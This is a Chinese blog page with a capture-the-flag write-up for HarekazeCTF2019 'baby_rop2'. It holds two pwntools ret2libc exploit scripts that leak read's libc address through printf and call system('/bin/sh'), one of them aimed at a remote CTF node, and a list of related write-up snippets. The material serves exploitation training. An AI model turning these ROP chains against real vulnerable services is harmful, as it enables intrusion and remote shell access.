HarekazeCTF2019 baby_rop2

最新推荐文章于 2024-05-05 22:46:05 发布
原创 最新推荐文章于 2024-05-05 22:46:05 发布 · 310 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了HarekazeCTF2019比赛中baby_rop2的解决过程,重点讨论了在调试过程中遇到的问题,即不能利用printf函数的全局 offsets to functions (got) 表进行攻击。通过对挑战的深入分析,揭示了如何在限制条件下利用返回导向编程(ROP)技术来完成挑战。 
from pwn import *
p = process('./babyrop2')
libcelf = ELF('./libc-2.23.so')
p = process('./babyrop2')
p.recvuntil("What's your name? ")
pltprintf = 0x00000000004004F0
gotread = 0x0000000000601020
poprdiret = 0x0000000000400733
poprsir15ret = 0x0000000000400731
fmt_str = 0x0000000000400770
start = 0x0000000000400540
payload = 40 * 'a' +  p64(poprdiret) + p64(fmt_str) + p64(poprsir15ret) + p64(gotread) + p64(0) + p64(pltprintf) + p64(start)
p.sendline(payload)
realread = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libcbase = realread - libcelf.symbols['read']
log.success(hex(libcbase))
system = libcbase + libcelf.symbols['system']
binsh = libcbase + libcelf.search('/bin/sh').next()
p.recvuntil("What's your name? ")
payload = 40 * 'a' +  p64(poprdiret) + p64(binsh) + p64(system) + p64(start)
p.sendline(payload)
p.interactive()

备注:调试发现不能使用printf函数的got表

[HarekazeCTF2019]baby_rop2
m0sway的博客
04-07 1193
[HarekazeCTF2019]baby_rop2 WriteUp BUU_PWN
BUUCTF Pwn [HarekazeCTF2019]baby_rop2 题解
qq_33348179的博客
12-16 389
因为这是64位程序 所以用寄存器传参;又因为printf得传至少2个参数 所以要用到寄存器RDI RSI。查到的rsi多了个r15寄存器 但不需要用到 所以写payload的时候记得填充它。这里的打印函数是printf 所以利用printf函数的plt输出真实地址got。查看main函数 看到给了个libc说明这题是ret2libc题。但printf的got好像不行 所以换成了read的got。第一个rdi传入printf里的格式化字符串。下载 得到两个文件 checksec。64位 拖入IDA64。
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 484
IDA Pro 静态调试。依旧可以使用上次的PoC。
[HarekazeCTF2019]baby_rop[BUUCTF]
moonlightsunshin的博客
05-05 580
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
BUUCTF-[HarekazeCTF2019]baby_rop2
Rt1Text的博客
11-08 472
泄露libc基地址,计算system,bin/sh地址,覆盖返回地址。最后ls没有发现flag,寻找flag。还要注意64位传参,寄存器的使用。直接cat flag在的位置即可。
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 2122
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
buuctf [HarekazeCTF2019]baby_rop2
carol2358的博客
04-21 509
一道常规的泄漏libc然后rop的题目 exp: from pwn import * from LibcSearcher import * local_file = './babyrop2' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 if select == 0: r = proce...
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1809
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
[HarekazeCTF2019]baby_rop
m0sway的博客
03-26 678
[HarekazeCTF2019]baby_rop WriteUp BUU_PWN
harekazeCTF2019_babyrop2
weixin_44645415的博客
05-26 409
解题思路:ROP 检查保护 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 定位漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[28]; // [rsp+
[HarekazeCTF2019]baby_rop2 wp (python3)
Kata_Jhin的博客
05-21 326
而我们用到的format,是很大依托的,所以需要用recvutil,64下的地址开头基本上都是"\x7f"所以就可以把它当做标识符,因为是小端序,所以我们从-6开始正序读取(-6标识符下的第一个数字是-1)比较明显的libc,因为是64位程序,所以需要‘’pop+参数数据add的‘’形式,不然不符合64的函数调用约定,这里泄露就直接使用主函数的那个存在%s的字符串。因为是全路径检索,后面的permission denied是没权限的意思,结果太多我一来没看见第一行的查询找到的结果(阿西....)
[HarekazeCTF2019]baby_rop2【BUUCTF】
qq_41696518的博客
09-02 515
明显存在栈溢出,那么就是找system和/bin/sh的问题了,该题给了libc,那就是泄露出真实的libc载入基址本题即可求解。由于本题是64位的,因此参数要写入寄存器中,顺序为rdi,rsi,rdx,rcx,r8,r9。
[HarekazeCTF2019]baby_rop2 1
最新发布
10-27
[HarekazeCTF2019]baby_rop2是一道64位、开启了NX保护的Pwn题目,利用思路为ret2libc,涉及printf函数和read函数。程序中定义了`char buf[28];`,但在使用`read(0, buf, 0x100uLL);`时,向buf读取输入最多256(0x100)个无符号长整型常量,而buf数组大小仅为128,存在缓冲区溢出漏洞[^1]。 以下是该题的一个解题脚本: ```python from pwn import * from LibcSearcher import * #p = process('./babyrop2') p = remote("node5.buuoj.cn", 29847) elf = ELF('./babyrop2') printf_plt = elf.plt['printf'] read_got = elf.got['read'] main_address = 0x400636 pop_rdi = 0x400733 pop_rsi_r15 = 0x400731 formart_str = 0x400770 payload1 =b'a' * (0x20 + 8) + p64(pop_rdi) + p64(formart_str) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_address) p.sendlineafter("name? ", payload1) read_address = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) print(hex(read_address)) libc = ELF('./libc.so.6') offset = read_address - libc.symbols['read'] binsh = offset + libc.search('/bin/sh').__next__() system = offset + libc.symbols['system'] payload2 = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(binsh)+ p64(system) p.sendline(payload2) p.interactive() ``` 该脚本的攻击思路是,第一次泄露一个地址,然后获取system函数地址和`/bin/sh`字符串,第二次实现注入。具体是先通过构造`payload1`进行栈溢出,覆盖返回地址,用printf函数输出read函数的地址,再返回主函数使栈初始化,以便再次进行栈溢出。发送完`payload1`后,函数先运行到`return 0`,再执行构造的语句,因为返回地址已被覆盖。之后根据泄露的read函数地址计算偏移,进而得到system函数和`/bin/sh`字符串的地址,构造`payload2`实现最终的注入并获取交互shell [^3][^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值